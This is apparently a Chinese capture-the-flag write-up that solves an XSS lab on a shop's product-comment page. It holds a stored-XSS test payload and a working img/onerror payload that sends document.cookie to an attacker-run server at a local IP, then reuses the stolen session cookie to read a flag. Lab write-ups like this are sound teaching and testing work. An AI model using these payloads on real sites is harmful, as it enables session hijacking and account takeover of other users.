靶机名字是xss+csrf那么一般就是一些可以让用户编辑发布之后,其他用户也可以访问点击的功能。例如:文档发布,评论,留言,日志等场景。经过前段渲染之后作为js语句被执行。 商城系统,最经典的xss场景就是产品评论。 随便找一个商品的评论页面,自己随便写一个评论,可以进行发布。 尝试弹窗,先验证能不能xss
<img src="/" =_=" title="onerror='prompt(1)'">
发布之后可以进行弹窗,验证功能点有xss,实际场景可能会有很严格的过滤,不会简单的直接插入js语法或者html就标签就执行。
可能需要结合f12之后查看页面当前渲染的html代码,结合自己的payload判断转义和过滤。
https://github.com/pgaijin66/XSS-Payloads
一个github项目,有挺多变形xss的payload。
因为提示中提到:

结合抓包是通过cookie鉴权的,基本可以确定,是通过是拿cookie的。
本地起一个http服务器,用来收cookie。
尝试了几个语句,找到一个可以用的:
<img src=x onerror=\"new Image().src='//192.168.111.25:8080/?c='+encodeURIComponent(document.cookie)\
等一会就可以接收到mht用户的cookie。
拿到之后,访问个人页面,用bp将cookie替换,可以在历史订单的响应中拿到flag。






请登录后查看回复内容